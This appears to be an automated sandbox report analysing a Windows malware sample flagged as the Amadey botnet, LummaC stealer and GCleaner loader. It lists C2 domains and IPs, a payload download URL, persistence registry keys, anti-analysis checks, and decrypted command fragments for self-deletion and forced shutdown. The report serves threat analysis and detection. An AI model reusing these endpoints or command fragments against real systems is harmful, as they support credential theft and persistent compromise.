Edit tour

Windows Analysis Report
wJWNpO6lcm.exe

Overview

General Information

Sample name:	wJWNpO6lcm.exe renamed because original name is a hash value
Original sample name:	b262bb96b63ac01762d1baf06387290c.exe
Analysis ID:	1636862
MD5:	b262bb96b63ac01762d1baf06387290c
SHA1:	15e96782f20249b4ae1ce85a2081146ac0041691
SHA256:	61c9c78577f6c4506828cb6cf9ce9b3f15592a1cc8d462151df8983c7aaa5846
Tags:	exeuser-abuse_ch
Infos:

Detection

Amadey, GCleaner, LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected GCleaner

Yara detected LummaC Stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wJWNpO6lcm.exe (PID: 8520 cmdline: "C:\Users\user\Desktop\wJWNpO6lcm.exe" MD5: B262BB96B63AC01762D1BAF06387290C)

rapes.exe (PID: 8700 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: B262BB96B63AC01762D1BAF06387290C)

rapes.exe (PID: 8812 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: B262BB96B63AC01762D1BAF06387290C)

rapes.exe (PID: 3576 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: B262BB96B63AC01762D1BAF06387290C)

2ea5560900.exe (PID: 3624 cmdline: "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe" MD5: 5B63B3A5D527ED5259811D2D46ECCA58)

2ea5560900.exe (PID: 3240 cmdline: "C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe" MD5: 5B63B3A5D527ED5259811D2D46ECCA58)

a99d155ba8.exe (PID: 9192 cmdline: "C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe" MD5: 23C4AD523B7874B9F62FDA1935671BBD)

BitLockerToGo.exe (PID: 9108 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
GCleaner		No Attribution	https://bazaar.abuse.ch/browse/signature/GCleaner/ https://github.com/VenzoV/MalwareAnalysisReports/blob/main/GCleaner/GCleaner%20Techincal%20Analysis%20with%20BinaryNinja.md https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/ https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/	https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Malware Configuration

Threatname: LummaC

{"C2 url": ["zfurrycomp.top/kFwo", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Threatname: GCleaner

{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.3842363077.000000000DA4A000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3842910350.000000000DB2C000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000002.00000002.1446784481.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000E.00000002.3833830695.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3843410151.000000000DD30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
00000000.00000002.1414746165.0000000000C21000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000D.00000003.3810839454.000000000DCE6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3842363077.000000000DA1E000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3842910350.000000000DB82000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000001.00000002.1439116662.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000D.00000002.3842910350.000000000DB00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3842363077.000000000DA80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
0000000D.00000002.3842910350.000000000DC12000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
0000000D.00000002.3843410151.000000000DCF6000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
Process Memory Space: 2ea5560900.exe PID: 3240	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2ea5560900.exe PID: 3240	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.BitLockerToGo.exe.400000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.a99d155ba8.exe.da4a000.1.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.a99d155ba8.exe.dcf6000.6.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
14.2.BitLockerToGo.exe.400000.0.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.3.a99d155ba8.exe.dcf6000.0.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.a99d155ba8.exe.da1e000.2.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.a99d155ba8.exe.da80000.3.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
13.2.a99d155ba8.exe.db00000.5.raw.unpack	JoeSecurity_GCleaner	Yara detected GCleaner	Joe Security
6.2.rapes.exe.ad0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.wJWNpO6lcm.exe.c20000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.2.rapes.exe.ad0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.2.rapes.exe.ad0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 7 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:12:19.808326+0100	2028371	3	Unknown Traffic	192.168.2.5	49798	104.21.112.1	443	TCP
2025-03-13T08:12:23.460998+0100	2028371	3	Unknown Traffic	192.168.2.5	49801	104.21.112.1	443	TCP
2025-03-13T08:12:26.418553+0100	2028371	3	Unknown Traffic	192.168.2.5	49802	104.21.112.1	443	TCP
2025-03-13T08:12:30.002703+0100	2028371	3	Unknown Traffic	192.168.2.5	49804	104.21.112.1	443	TCP
2025-03-13T08:12:33.740772+0100	2028371	3	Unknown Traffic	192.168.2.5	49806	104.21.112.1	443	TCP
2025-03-13T08:12:38.648394+0100	2028371	3	Unknown Traffic	192.168.2.5	49809	104.21.112.1	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:09:44.080099+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49731	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T08:12:15.464658+0100	2803305	3	Unknown Traffic	192.168.2.5	49797	176.113.115.7	80	TCP
2025-03-13T08:12:21.583203+0100	2803305	3	Unknown Traffic	192.168.2.5	49800	176.113.115.7	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wJWNpO6lcm.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://zfurrycomp.top:443/kFwozchhhv.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top:443/kFwol	Avira URL Cloud: Label: malware
Source: crosshairc.life/dAnjhw	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/kFwoqR	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top:443/kFwo	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/kFwo	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/fate/random.exe	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/xb	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/kFwoU7p0R	Avira URL Cloud: Label: malware
Source: zfurrycomp.top/kFwo	Avira URL Cloud: Label: malware
Source: https://zfurrycomp.top/kFwo3	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\10198680101\a99d155ba8.exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Avira: detection malicious, Label: TR/Kryptik.jihlg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: TR/Kryptik.jihlg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794

Found malware configuration

Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 13.2.a99d155ba8.exe.da80000.3.raw.unpack	Malware Configuration Extractor: GCleaner {"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
Source: 12.2.2ea5560900.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["zfurrycomp.top/kFwo", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: wJWNpO6lcm.exe	Virustotal: Detection: 59%			Perma Link
Source: wJWNpO6lcm.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 176.113.115.6
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Ni9kiput/index.php
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: bb556cff4a
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rapes.exe
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Keyboard Layout\Preload
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000419
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000422
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 00000423
Source: 00000006.00000002.3834500680.0000000000AD1000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0000043f
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: zfurrycomp.top/kFwo
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: crosshairc.life/dAnjhw
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: mrodularmall.top/aNzS
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: jowinjoinery.icu/bdWUa
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: legenassedk.top/bdpWO
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: htardwarehu.icu/Sbdsa
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: cjlaspcorne.icu/DbIps
Source: 12.2.2ea5560900.exe.400000.0.unpack	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041C833 CryptUnprotectData,CryptUnprotectData,	12_2_0041C833
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041BCC0 CryptUnprotectData,	12_2_0041BCC0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041C833 CryptUnprotectData,CryptUnprotectData,	12_2_0041C833

Source: wJWNpO6lcm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49809 version: TLS 1.2

Source:	Binary string: BitLockerToGo.pdb source: a99d155ba8.exe, 0000000D.00000002.3842910350.000000000DBD8000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: a99d155ba8.exe, 0000000D.00000002.3842910350.000000000DBD8000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00BA8ECE FindFirstFileExW,	11_2_00BA8ECE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 11_2_00BA8F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	11_2_00BA8F7F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BA8ECE FindFirstFileExW,	12_2_00BA8ECE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BA8F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_00BA8F7F

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]	12_2_0041C833
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h	12_2_00421890
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]	12_2_00421890
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]	12_2_00413143
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CF91E6EAh	12_2_0044A106
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	12_2_00412AF8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then lea ecx, dword ptr [eax-40000000h]	12_2_00412AF8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then lea edx, dword ptr [ecx+ecx]	12_2_00412AF8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	12_2_0044C2A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]	12_2_00444300
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]	12_2_0044D300
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov word ptr [ecx], bx	12_2_0044D300
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	12_2_0044C3A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]	12_2_0044C3A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then mov ebp, ebx	12_2_0044C3A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 4x nop then movzx ecx, di	12_2_0042FE40
